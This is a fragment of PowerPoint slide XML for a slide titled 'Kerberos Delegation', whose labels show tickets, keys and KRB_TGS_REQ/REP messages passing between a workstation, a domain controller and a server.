              <a:xfrm>
                <a:off x="3111530" y="3857261"/>
                <a:ext cx="2500581" cy="139031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spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:endParaRPr lang="de-DE" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="103" name="TextBox 102"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3692408" y="4047198"/>
                <a:ext cx="1671680" cy="838691"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Ticket-</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                  <a:t>Granting</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t> Ticket</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Authenticator</a:t>
                </a:r>
                <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="104" name="Picture 10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83621" y="3977609"/>
                <a:ext cx="472016" cy="312696"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="101" name="Picture 10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239077" y="4461936"/>
              <a:ext cx="351058" cy="573771"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Right Arrow 104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3109495" y="1835509"/>
            <a:ext cx="2502616"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5. KRB_TGS_REQ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>/domain</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="12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3187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9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="11"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6. TGS Reply with OK_AS_DELEGATE flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Right Arrow 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3097225" y="1841466"/>
            <a:ext cx="2502616"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6. KRB_TGS_REP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>/domain</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" dirty="0">
              <a:ln w="0"/>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="92" name="Group 91"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="152030" y="4844491"/>
            <a:ext cx="2795151" cy="1441365"/>
            <a:chOff x="3025668" y="3771580"/>
            <a:chExt cx="2795151" cy="1441365"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="93" name="Picture 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9693" y="3953993"/>
              <a:ext cx="2651126" cy="1258952"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>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5668" y="3771580"/>
              <a:ext cx="499308" cy="685686"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="95" name="TextBox 94"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4022720"/>
              <a:ext cx="2562935" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="96" name="TextBox 95"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4254546"/>
              <a:ext cx="2562935" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Service Credentials Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="97" name="Picture 9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2319" y="4593843"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="98" name="TextBox 97"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3932492" y="4653136"/>
              <a:ext cx="1575612" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Service Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="180" name="Group 179"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5762801" y="1116830"/>
            <a:ext cx="3209859" cy="2797046"/>
            <a:chOff x="5771714" y="1415706"/>
            <a:chExt cx="3209859" cy="2797046"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="181" name="Picture 1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05578" y="1597989"/>
              <a:ext cx="2973722" cy="2593105"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="182" name="TextBox 181"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6671087" y="1698030"/>
              <a:ext cx="1442703" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Domain Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="183" name="TextBox 182"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6589790" y="1957026"/>
              <a:ext cx="1612173" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t>KDC Account Database</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="184" name="Picture 1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83374" y="2303223"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="185" name="TextBox 184"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6763295" y="2363506"/>
              <a:ext cx="1806580"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Service Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>System Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="186" name="Picture 1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71714" y="1415706"/>
              <a:ext cx="628030" cy="741586"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="187" name="Picture 18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19698" y="3450877"/>
              <a:ext cx="761875" cy="761875"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="188" name="Picture 18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78170" y="2812347"/>
              <a:ext cx="351842" cy="351842"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="189" name="Picture 1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6185" y="3298419"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="166" name="Group 165" hidden="1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6026321" y="3022973"/>
            <a:ext cx="2693477" cy="3143132"/>
            <a:chOff x="5693658" y="2843111"/>
            <a:chExt cx="2693477" cy="3143132"/>
          </a:xfrm>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="bg1">
                <a:alpha val="0"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="167" name="AP_REQ Content"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5693658" y="2843111"/>
              <a:ext cx="2693477" cy="3143132"/>
              <a:chOff x="6158571" y="1914643"/>
              <a:chExt cx="2693477" cy="3143132"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="172" name="AP_REQ Content"/>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58571" y="1914643"/>
                <a:ext cx="2693477" cy="3143132"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:effectLst>
                <a:glow rad="1041400">
                  <a:schemeClr val="bg1"/>
                </a:glow>
              </a:effectLst>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="173" name="TextBox 172"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6911533" y="4523428"/>
                <a:ext cx="1054776" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Authenticator</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="174" name="Picture 17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59893" y="4340281"/>
                <a:ext cx="289764" cy="573771"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="175" name="TextBox 174"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6928111" y="3160276"/>
                <a:ext cx="1468864" cy="687368"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="2000"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Session Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="2000"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>User Credentials</a:t>
                </a:r>
                <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="176" name="Picture 17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6592484" y="3593474"/>
                <a:ext cx="225134" cy="308918"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="177" name="Picture 1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44210" y="3118172"/>
                <a:ext cx="311866" cy="311866"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="178" name="TextBox 177"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6200422" y="2128997"/>
                <a:ext cx="2584827" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Use Ticket Flags</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="179" name="TextBox 178"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6200422" y="2433024"/>
                <a:ext cx="2584827" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>OK_AS_DELEGATE</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="168" name="TextBox 167"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5736630" y="3747856"/>
              <a:ext cx="2583706" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Service Ticket</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="169" name="TextBox 168"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5736630" y="5055254"/>
              <a:ext cx="2583706" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Authenticator</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="170" name="Picture 16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30095" y="5051507"/>
              <a:ext cx="193681" cy="284616"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="171" name="Picture 17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38876" y="3729806"/>
              <a:ext cx="195973" cy="287984"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="120" name="Workstation"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="203769" y="1124744"/>
            <a:ext cx="2745305" cy="3312979"/>
            <a:chOff x="203769" y="1124744"/>
            <a:chExt cx="2745305" cy="3312979"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="121" name="Picture 12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48390" y="1275402"/>
              <a:ext cx="2700684" cy="3162321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="123" name="Picture 1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44932" y="2316214"/>
              <a:ext cx="472016" cy="312696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="124" name="Picture 1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86486" y="2741991"/>
              <a:ext cx="348452" cy="348452"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="125" name="Group 124"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="203769" y="1124744"/>
              <a:ext cx="2685437" cy="665914"/>
              <a:chOff x="2925296" y="1597991"/>
              <a:chExt cx="2685437" cy="665914"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="155" name="TextBox 154"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3042792" y="1832275"/>
                <a:ext cx="2567940" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Workstation</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="156" name="TextBox 155"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3042793" y="2079239"/>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157" name="Picture 15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925296" y="1597991"/>
                <a:ext cx="566691" cy="526075"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="126" name="Picture 1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6928" y="1875916"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="127" name="TextBox 126"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="918031" y="1900853"/>
              <a:ext cx="1789823" cy="2062103"/>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Ticket</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Ticket-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>Granting</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t> Service Session Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Service Ticket</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Session Key</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="128" name="Picture 12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10449" y="3653217"/>
              <a:ext cx="380199" cy="375562"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="154" name="Picture 15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57684" y="3264942"/>
              <a:ext cx="475522" cy="315018"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3100941" y="2048971"/>
            <a:ext cx="2500581" cy="1948004"/>
            <a:chOff x="3100941" y="2048971"/>
            <a:chExt cx="2500581" cy="1948004"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="132" name="Group 131"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3100941" y="2048971"/>
              <a:ext cx="2500581" cy="1948004"/>
              <a:chOff x="3111530" y="3857261"/>
              <a:chExt cx="2500581" cy="1948004"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="134" name="Group 133"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3111530" y="3857261"/>
                <a:ext cx="2500581" cy="1948004"/>
                <a:chOff x="3111530" y="3857261"/>
                <a:chExt cx="2500581" cy="1948004"/>
              </a:xfrm>
            </p:grpSpPr>
